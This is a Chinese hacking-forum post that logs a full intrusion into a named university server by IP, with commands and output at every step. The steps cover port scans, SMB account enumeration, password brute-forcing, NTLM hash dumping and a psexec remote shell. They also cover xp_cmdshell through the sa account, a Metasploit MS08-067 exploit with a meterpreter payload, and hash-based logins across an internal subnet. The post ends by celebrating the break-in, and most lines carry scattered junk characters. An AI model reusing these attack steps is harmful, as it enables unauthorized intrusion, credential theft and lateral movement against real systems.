找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3010|回复: 0
打印 上一主题 下一主题

nmap+msf入侵广西师范

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 12:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
广西师范网站http://202.103.242.241/
! Y" B& \2 o& T* B1 a3 Z& ]+ v
* S  }0 i4 L9 Y/ V% Hroot@bt:~# nmap -sS -sV 202.103.242.241! T% C. M0 T# R$ o

& m0 A! v* E+ n3 q) FStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST$ Q% w& X' ^; [/ M4 z/ g$ Q

/ L- u' |: N. u% T2 R$ QNmap scan report for bogon (202.103.242.241)( B& Z' b: B+ W" g( ]& k

: Z- k% i- T8 vHost is up (0.00048s latency).2 A$ ]6 Z' _3 k, H/ P, a. [

* X& e# q! k0 N, U+ G( vNot shown: 993 closed ports* y1 z5 [- b2 u# V5 X8 P

$ v  r9 y! u: ]& [7 dPORT     STATE SERVICE       VERSION
( z$ x) G6 l( `/ U: V
: c: `* h' Y9 k, C+ ^135/tcp  open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)( `4 D. X0 J$ X( P# o
. q. h1 c# Y! U
139/tcp  open  netbios-ssn
. w* ^+ I6 }( D6 }2 Y; _9 `* A" ?2 c( L& k" M% g' s. y0 o
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
& U1 j6 K; |" b! c. W
0 l4 ?0 R) q# ^1025/tcp open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)! z( s+ E! q1 o* _/ U" Q: D

- Q$ m  O$ c, a5 d$ F& Q1026/tcp open  msrpc         Microsoft Windows RPC5 R5 P7 i& i$ _3 V, h; w& _; x
& V- }* _. t2 [8 R! w
3372/tcp open  msdtc?& V$ h$ x& j; b8 o

' T6 v2 }+ Y2 n3 u) k3389/tcp open  ms-term-serv?. [, `( |9 q! Z+ L

+ {  A1 D/ @0 {' `- r1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :6 f6 E6 t* l  K% `& K( t2 {6 g
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r5 @) G9 `3 t' u& r" W+ I7 d

- S4 m* U  Z7 R* c2 @SFGetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
! d8 K% K* n, @2 p& ^; N
* M9 G, T" o/ FSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
2 B1 n+ }7 a& g7 S# g2 w
3 {, w2 j) l) {2 J. }. KSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO6 c8 N7 H8 M7 |8 D
& J/ u# t* U6 l. f
SF:ptions,6,”hO\n\x000Z”);  H: V- e8 G3 @% h( o# t

( K, L/ J3 [' o6 VMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)' F$ @8 D4 F! V# i$ Q2 @0 S
/ i6 W  y/ c7 Q( s' F: F7 W0 G* K/ G
Service Info: OS: Windows" s2 @( I: Z9 m/ G: V! d( Q6 k7 R0 H
! k3 u  \, _6 o% m2 g% L
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
+ x" p5 M* O8 z0 e  ?* d3 N1 Y3 b2 P$ t: O, E" r5 b& ?' h
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
2 G7 e  z0 g1 ^. v9 O
1 Z7 t+ z# {6 q, i, g, {& Oroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  //列出扫描脚本
  B. o9 o, S. b& m, d- Y' D: v" y- b2 T) J" z/ f1 l
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
2 k9 G  P( K( Z! v& i$ J' w$ q. G% M& ^/ k( h7 E: n
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse8 R! b+ b; V2 I) c

/ D4 [1 N6 t4 ^0 E-rw-r–r– 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
2 b- {2 Y2 x1 K$ B
4 j; `6 K6 m4 R) ]& j-rw-r–r– 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse4 V4 C4 M) Y- n; b$ {

8 f! t" e1 l3 P; s1 K7 O& B$ L-rw-r–r– 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse) S! m1 l/ {, K+ H# X

. d$ ~& u5 y5 d' T( j-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse% ]1 p; o. _' `3 t
  d0 f# M7 C( {% I
-rw-r–r– 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
( _9 l2 F! {+ @$ w7 A
, ^  D8 Q0 }/ {  l4 D& g6 t-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse$ _3 s4 T& c3 u4 R* t! S
4 {: Y+ v4 `  E" J  S
-rw-r–r– 1 root root  1658 2011-07-09 07:36 smb-flood.nse
; \$ G: I' q$ {6 m5 s3 [6 E* i4 `7 j& e/ k$ f) {+ h5 w0 x7 H. i
-rw-r–r– 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
9 I* A' V, o& y* R
) c! e0 a# J& \  \-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
+ \/ N, f# ]( p1 T
0 H/ X; i% j6 L8 Y$ e- t-rw-r–r– 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
+ A2 ?+ [; Y' S3 J( v/ B
2 f/ a  G$ G4 X9 U( }; P0 }2 J-rw-r–r– 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
/ g6 n% f7 Q, w! x& \3 X
- k& J% C/ Q0 z/ H2 S, X9 v-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
" x7 |/ e, q/ w# D% i: p* M& _9 L5 A/ J% ~- Y
-rw-r–r– 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse/ ~+ e2 A7 S% ]- T+ A; H/ h% O
# t: P( o" _# ~/ H- `) R$ z6 q" D& @5 ~
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241   & p" q* P8 C: ]! F& U. W2 Y: T
7 j4 ]1 N, n9 X) w4 [( n* R
//此乃使用脚本扫描远程机器所存在的账户名
; _) A7 ]4 X6 s, M0 B* ]( I9 P4 N% F! l2 o( M- [
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST9 ]# c  r% ?; ?5 Z
: ?% M8 W, h) Z) s
Nmap scan report for bogon (202.103.242.241)
) w$ [1 A2 H1 Q$ h7 ^
8 ?6 G. Z* i+ |( QHost is up (0.00038s latency).  L, N1 J5 M4 c, a

) D3 z5 m8 \. J+ dNot shown: 993 closed ports
* Q7 @9 [2 V6 Y% i- I  r/ G( E/ G9 g" I/ O7 p
PORT     STATE SERVICE; G3 d5 q* j  B$ N! T# V0 m

6 y+ H$ \: l( P4 L2 ]135/tcp  open  msrpc
1 d: {5 z6 j4 k. x5 A  {
+ r! U1 A/ F% n/ S$ V139/tcp  open  netbios-ssn
& B6 L. t6 p& \- _! z) A" J+ ^: t3 o; ?5 E* l
445/tcp  open  microsoft-ds
5 u6 Y+ c" v( k- U# p% T: B  o3 m6 t. n/ H
1025/tcp open  NFS-or-IIS
9 e* v, E) v) X, q8 }4 G6 R& ~4 L  O% S
1026/tcp open  LSA-or-nterm% O& ^# j& T" d

3 _. n) G  R+ j9 h; N3372/tcp open  msdtc
( |4 ~0 q, F. p$ |; ~" Q
8 B& y* r3 C% k8 S" \3389/tcp open  ms-term-serv
) Q7 R! I) N7 M) |9 O, |0 f
5 \! B8 y9 ?) }& j4 J4 eMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)5 k& `( o6 F% u2 T

' f& l+ e. l+ P$ s4 @4 vHost script results:
( I5 U6 ~' ]$ K. h9 u& b3 c$ r7 W) V# i4 D
& ?4 Q; V) ^7 o& A( V/ }! ]| smb-enum-users:
, S9 {3 X  H; ^) Q/ J
2 i$ J/ X) C  u( n|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
; A: W, W% k8 W( d, ~4 w$ J( a3 p6 H2 r
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
# d. }% x% ]/ b: z: m+ g0 ^* L/ A# U# P) s
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 $ I6 z0 [  U# \, K7 M" F0 g- Z, r
% e. X2 C5 @' @" F+ U1 W, o% g
//查看共享  R& J3 L" t2 P# H2 A( {4 N
1 v; G$ P: H2 w
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST  G9 n# b4 D* `

) N8 g3 h% g- z' G" SNmap scan report for bogon (202.103.242.241)
& V/ ?+ Y" ~- z4 L6 {4 T! m
' r: [7 N7 P9 h1 QHost is up (0.00035s latency).
: {5 e3 _6 [- [( w+ b+ t4 S
0 c5 i* c, ?9 X, lNot shown: 993 closed ports- ~2 q/ o3 a& y) S% X; z8 L5 T

. ]: I$ _9 f3 W; BPORT     STATE SERVICE
# t9 e1 j0 y) W# {+ J( M; r" }) K' F! Q( }+ V% x
135/tcp  open  msrpc7 H" \5 m9 q/ u4 m

: a: V! \1 Z; L8 Y3 `. P# D139/tcp  open  netbios-ssn
$ O3 f% F( Z" j& L: |
1 O% {( s3 z: _& y% ]445/tcp  open  microsoft-ds
0 g* H4 p0 P' J
& f4 w9 B% `+ i7 U1025/tcp open  NFS-or-IIS
1 I1 {* K  o0 y5 E/ g2 D* C0 z: e) p4 ~4 L' e9 l8 }
1026/tcp open  LSA-or-nterm
& {$ y9 Q4 j  l. q  b& r6 ?" X$ u+ M4 P3 z
3372/tcp open  msdtc4 k$ H7 u2 }4 G; x

) z7 V# k( X' Z. f, Y3 T3389/tcp open  ms-term-serv4 W1 `/ x% m* Z

/ w$ }$ i( }: y& S. k  y* ~MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)  b* i7 X* ^, ]6 k' m8 p
- {/ W: _9 _# q" L" I
Host script results:( z4 j& X6 z* a% X: @
8 H+ y: D$ d& p% U8 R
| smb-enum-shares:+ y2 K, p* }; ^$ P9 w  K) C
6 n( y: u! K$ |7 i- G& ?
|   ADMIN$! {6 q" {# }1 H( g/ E; V; H* Q

7 S$ r* |' X) C/ }% _& l2 {* O: l|     Anonymous access: <none>" p6 @" X0 c/ m% Y  e, h

2 m( M+ I- {/ P/ t|   C$: t: x. D* E/ z+ L

' F. `8 Y6 p5 k% d% J/ C4 h0 U|     Anonymous access: <none>
5 T1 x1 j4 [% _
9 @9 k9 O  G$ p. f  K  v# m|   IPC$* L9 k8 c) c% W& \  [
2 |; I8 \5 \9 C( R: d+ C
|_    Anonymous access: READ6 Z( `4 g8 A: W5 x5 A9 H2 W

5 t" `' Q8 B( V7 Y/ KNmap done: 1 IP address (1 host up) scanned in 1.05 seconds
& Q8 m/ C/ N5 H' x+ ?2 q( C. W5 L1 [  F) s2 A, ?: V
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241      
. G5 E  P( a% Q2 |% J! K8 [
; K# ~" O6 W  v$ f' p! N( n//获取用户密码5 W& c1 L  E5 H& V$ p6 A

, S: B& y# C# r' |3 S5 Q# y+ u2 zStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
0 C: h! e, e, g& c! X
& z5 w& ?, ^' _( A# J+ ?; Q) `Nmap scan report for bogon (202.103.242.2418)
: y" n1 f% w8 h9 u2 G; d, V9 ?+ U" L& d! ?2 G7 C* ], o5 _
Host is up (0.00041s latency).
9 _5 N, ?8 R# l2 z* i6 s& D8 H9 I3 C/ Z
Not shown: 993 closed ports
& o5 r% b8 r% ?0 X1 z
: u! ^, i2 J, i3 r6 LPORT     STATE SERVICE
( Q4 r. j1 d& J* Z& `* x; O
; D% B, v' S& L135/tcp  open  msrpc) N2 o7 G, _1 U
$ X  f1 z5 ~0 B0 v/ {* k; f
139/tcp  open  netbios-ssn6 C9 {& z8 u, O; C
5 x- G4 W8 F8 i
445/tcp  open  microsoft-ds
+ h+ n' \  y! @% D0 Z) ~+ n) w% N' Z/ j6 F( m% z
1025/tcp open  NFS-or-IIS
* Q4 N5 x9 m3 R+ Q8 G
9 O" }4 R8 I5 m! M- G' ~1026/tcp open  LSA-or-nterm
, Z& v2 e: x* ?# d* C) V" R
  n) v8 y0 q1 _. G/ L! M3372/tcp open  msdtc
$ \# u6 |' y( w9 \4 l  n; ]+ g; |! N( t6 q2 R+ [
3389/tcp open  ms-term-serv
5 U0 Y. }9 q; R  a; b" U, X# q6 C9 q  S) d
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
( k- w- y$ D. n: Q# x, S2 H
$ Q/ Y+ H, l8 |/ bHost script results:
+ \+ `6 d  j% H7 m  E/ A3 X' e1 V# R1 j& c  a
| smb-brute:
$ Z8 K6 o7 G: p; z% A( l8 @' I
0 c8 O0 w2 R, K, m, Q* padministrator:<blank> => Login was successful' R+ J' T" W* q1 C4 f; e0 h

( A3 Y' R- i5 @% \/ p: m/ \|_  test:123456 => Login was successful
% T9 x5 U3 s; L# @/ D$ {
5 t5 Q. f! T/ ?Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
0 a/ u7 \+ O  {% j' f/ v1 w2 \6 d$ S, [/ ]3 W2 q" d5 N- F+ \
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash( w1 |6 M: c' d# B+ n3 q) B; [
5 {) H$ i. S% H% R, [: |
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
: B0 U4 y! S  E' U
2 s. m, u8 J' }7 ?, nroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
9 }+ X7 w) C  o, l$ k2 P$ W) H/ o. x3 m0 X
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1395 Z# B& w. E: t8 N. ]( w
& F; g2 M  g7 m
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST( b! M# V, D! k% o/ I3 R

( D2 x* e! y/ H; B6 B. w7 ?Nmap scan report for bogon (202.103.242.241)& O& D0 N+ o3 ^/ \* S# G/ o2 z- G
. k. ?' V3 p; A( J0 Z+ O0 ~6 ^+ c, t/ z
Host is up (0.0012s latency).
& Q; g) v2 Y8 o) w" M/ i0 o3 c" M9 _% K$ c* q
PORT    STATE SERVICE
3 o7 o3 s$ S  Z6 j5 o8 R' s8 j* m( h4 T7 P9 m: X+ @( z
135/tcp open  msrpc
# j2 t3 ~! f. D; R8 ?$ ~8 L
! r, `0 B" ?/ ~- `5 Q2 \139/tcp open  netbios-ssn
% G, ]! z$ q  ]8 s" U. L7 Y0 R3 a8 \+ M
445/tcp open  microsoft-ds! Z0 E! E  X2 y# V- H
4 |( b3 s; [) w! ~( T1 q
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
" g6 u. M' F6 v+ r! r/ h, k' p% _  |1 Q
Host script results:
' U5 y4 Q0 ?4 z: ]" f( c9 m' R, D6 ~% y! D% i: B6 L* S
| smb-pwdump:' {- \2 e3 `8 G/ O4 }5 W
9 @! O* z* R! E
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
" `/ _& m/ s5 j+ m3 W
0 w" m7 s; G# N" Q* X* I. ]  a| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
# I( J2 o' ?3 ~9 d) l% L% |
# t0 f, W, K) F% L8 R9 _' G' B| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
- l# T# h# Y5 |* a
% h2 M. m, V+ G; g|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
! b: l6 d, X/ e+ {8 v: g6 ~
  A; w& I- X+ _3 E! SNmap done: 1 IP address (1 host up) scanned in 1.85 seconds; p7 p) Y  |1 `8 w! @* T/ ^7 B0 h
. d/ P( H3 e( O. _  @6 T9 ^
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241  -u test             //获取一个cmdshell* H* p3 }$ F* e. O2 r4 g
- S' _- e3 u. b: h3 x! a9 R
-p 123456 -e cmd.exe
8 q$ F, s, U/ m; p
+ w! K( ^9 v2 r4 \; t, HPsExec v1.55 – Execute processes remotely
# o" S2 m/ Q' v8 |5 R% Q+ J) Z# C, b1 ~* k2 x: n
Copyright (C) 2001-2004 Mark Russinovich
3 P6 W8 L8 K; A. |
0 T: S( ]0 c9 \: q" Y5 r4 ~Sysinternals – www.sysinternals.com
8 R; ~9 B( G+ _* `, V2 L) C5 q0 ]; @& |& v/ q
Microsoft Windows 2000 [Version 5.00.2195]% O6 ?, P% c* t; l% J. V

3 s" R; G. y5 A) ^& h; P# j4 z$ g(C) 版权所有 1985-2000 Microsoft Corp.
- i: ~5 s. H3 q& D, w
" F6 g; y( Y8 H( Y( _C:\WINNT\system32>ipconfig4 K# f+ x  s- h
6 X- }- E. S  D2 u
Windows 2000 IP Configuration
- G/ u( C& G$ I& M9 l
9 A9 Y$ ^8 Y  p5 d$ JEthernet adapter 本地连接:
' I9 Z% }# Y" \7 I4 n) v) U  n
1 M* E5 [4 L9 d" o/ pConnection-specific DNS Suffix  . :) c/ _8 r4 T& x" z2 b" g# I  q

7 o4 c/ o$ v( kIP Address. . . . . . . . . . . . : 202.103.242.2415 b1 Z) q% a: X9 x6 S
7 N8 c6 c/ G/ |2 O' U  E
Subnet Mask . . . . . . . . . . . : 255.255.255.0
4 c4 }  q2 M5 T9 p/ B3 u, s  }
' g+ ^- u$ N0 O, UDefault Gateway . . . . . . . . . : 202.103.1.1
7 v8 i; W% H, _* ^2 u/ Y" I, F* i* B& r8 q9 k# l/ f2 Y
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “   //远程登录sa执行命令
% V* l7 R5 F+ w8 ]2 [* K- a
5 d& e% P+ R* _2 H& [root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241     //检测目标机器漏洞
& G! d# D, C1 _) [# x7 [; O8 V& U( s  r( U. A" F% K" b
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST' {1 Z4 ^0 p2 d

1 l* d9 Y8 |) B- S6 j' w. zNmap scan report for bogon (202.103.242.241)
, I, A7 q- {8 A+ z3 v/ N7 y# J2 p4 F( z  g% s; C
Host is up (0.00046s latency).$ s$ M8 c2 r/ i0 t6 X5 [

9 O. a) E1 W# _- z0 I5 ?Not shown: 993 closed ports
2 H4 {3 Z- D7 w6 b3 P
7 \5 H8 N* H; b9 T) \& oPORT     STATE SERVICE
- i9 r- n# B/ d! q# a- O5 X0 ~' D3 b0 Z( s# j5 D* f
135/tcp  open  msrpc' v9 b: C) ^; |: d% Y$ j) R
/ T5 k' q$ V# i
139/tcp  open  netbios-ssn; O2 l- h0 N: D) X! ]* i* _7 ~
& C1 i- d; ?1 ~% w/ @; q  C7 O
445/tcp  open  microsoft-ds. l6 D$ G0 M: B( U
( |$ `& F) q1 Y. h0 q# U; V. H
1025/tcp open  NFS-or-IIS
# z9 Z: {2 i. u; s; p; f; _
$ @" N8 z' z: T9 E) _1026/tcp open  LSA-or-nterm! C5 ^1 V- L- a! T7 S5 u% c

: K& A0 H8 W* n3372/tcp open  msdtc
8 k: u" K2 }$ ?# P* ?; E6 s. d% Q
  \8 [* K5 \" Y1 i  n; r0 c& i3389/tcp open  ms-term-serv
6 `" ^; d$ u& \: V4 G/ f% [: e0 Z2 C
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)4 U& X3 ]; S; U* L

$ h7 d9 D4 ]( O4 E9 `% w6 EHost script results:
9 v: h! k3 v% d
4 i/ t0 \7 k* O/ ^| smb-check-vulns:
7 W7 b+ X* j. r. t6 X
- i$ ~; P, ~, q( k" h6 V|_  MS08-067: VULNERABLE( Z: a+ Y6 A5 H$ g

3 K- e4 B  V3 A# @( \. LNmap done: 1 IP address (1 host up) scanned in 1.43 seconds
9 e9 {. k  j6 x8 N  z" M/ _( a) u1 N* l& s2 k
root@bt:~# msfconsole                                             //在msf上利用ms08-067漏洞对目标机器进行溢出/ E% S: D& I6 k

9 n3 X7 c2 m$ ^' y( a. ^msf > search ms08+ _, J5 S; Z0 B9 Z4 F) G6 N
% I! R; J/ x7 |
msf > use exploit/windows/smb/ms08_067_netapi; Y/ b- m4 Z# o
) p0 w% h9 q3 O, P/ A6 c+ R
msf  exploit(ms08_067_netapi) > show options- E2 g# x* v* J5 a: M2 `
9 q2 q; }7 }0 \& ?5 L
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.2418 z, P& }- T  I9 A* \$ p
6 e. e: F3 z. q1 N5 i( b
msf  exploit(ms08_067_netapi) > show payloads: j0 g! e+ U. o7 r& v. E. x

  k$ G) q  g' E+ wmsf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
$ H$ O6 \4 A7 ]3 N4 K- C
! \" i; F" a, v5 Y6 @% Cmsf  exploit(ms08_067_netapi) > exploit
9 I7 V6 [* P$ j; t
( D- g/ c6 X" Bmeterpreter >
  _, A$ T1 @- T' q9 P1 G! Z; o! R$ e' N
Background session 2? [y/N]  (ctrl+z)% P2 P! n1 G  _4 [- Z

$ Z$ o/ \6 F3 q" B/ ?msf  exploit(ms08_067_netapi) > sessions -l# I) x2 C( k# ~# e. ^

6 k# g3 r( g  \* T3 {. N. troot@bt:/usr/local/share/nmap/scripts# vim usernames.txt" J7 f- J5 l7 ]& I
& C: |# }2 E6 L" J! Y  F) l
test' F5 X7 n) |8 D7 R" }
3 a* T. A/ H0 b7 R) f/ B  U6 V
administrator
' U1 I" Q6 g$ _8 m4 R
% q/ D. m! G( X0 ~3 Jroot@bt:/usr/local/share/nmap/scripts# vim password.txt
& s! i1 w. v- m: c/ [2 g' u) a  t; I; W$ x) `6 P* N, g- P  Y
44EFCE164AB921CAAAD3B435B51404EE, g7 h# \& R) m* h$ Y, j
5 X- D: ~8 }7 n9 A+ F
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 0 L, W4 u& Y- \
* M2 O5 }. x/ P; b- X: \
//利用用户名跟获取的hash尝试对整段内网进行登录0 B. R& x  ]6 V9 ?9 r5 L1 E
0 u" o3 J7 F6 p' q4 _( H0 E
Nmap scan report for 192.168.1.105" e1 |3 F. `& R0 v5 x9 R3 U

. M  i1 L  T! }+ l! D/ {8 p2 }( nHost is up (0.00088s latency).
" x, z8 L' E! a9 d$ @* w/ B: T9 A3 W$ ?' h0 L
Not shown: 993 closed ports4 X. T/ S  \- p: t" p7 G; e* i3 E

8 ~( u1 U2 Z4 T( Y  M4 LPORT     STATE SERVICE
( p$ ]& z( U( V' h  C
1 V9 M+ C4 r* @- ?- q3 u/ t- W135/tcp  open  msrpc4 E, M' M  ]" D" I

2 X$ Q+ [4 P& ]  J8 i6 z# Y139/tcp  open  netbios-ssn% V  T' O. v0 E- ~& ?; I

9 g/ a) G/ N: P; |& b. j445/tcp  open  microsoft-ds  k, F4 l2 ?& {8 z
; \! d5 q- w9 R
1025/tcp open  NFS-or-IIS" d! w! m: v' `) d  S
( X9 l9 l( Z% _" q4 l; D  g
1026/tcp open  LSA-or-nterm
8 I* B- y( T% I: N6 P6 D
4 x: n3 v% c* U+ [3372/tcp open  msdtc9 i4 [0 t! b+ X  l( \9 V; ^5 J
7 ?& _  T* R# h. }
3389/tcp open  ms-term-serv1 Y. N; h/ L1 y$ G' w; `: u6 U

8 w0 p. F* v/ k9 f/ T; OMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)) h, P, |2 w; ~) i8 E4 }( n3 g
5 L4 z# [+ F/ G6 u  f6 q
Host script results:0 P0 L9 x7 N2 z  J1 n& M- r

9 c" [. |6 [$ r* I* u2 B. ]| smb-brute:
- K+ T: c# A) y, s/ ]
* J5 T( v* c0 \: T2 ^|_  administrator:<blank> => Login was successful
0 ?0 C8 ?( X5 ]0 Q+ z0 M
' ]4 [; j( b% [9 u  }* {攻击成功,一个简单的msf+nmap攻击~~·
9 I! _! G# D; {6 d# K) d! ^( Q* C$ z$ ~5 ?/ W- h0 O. \" t
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表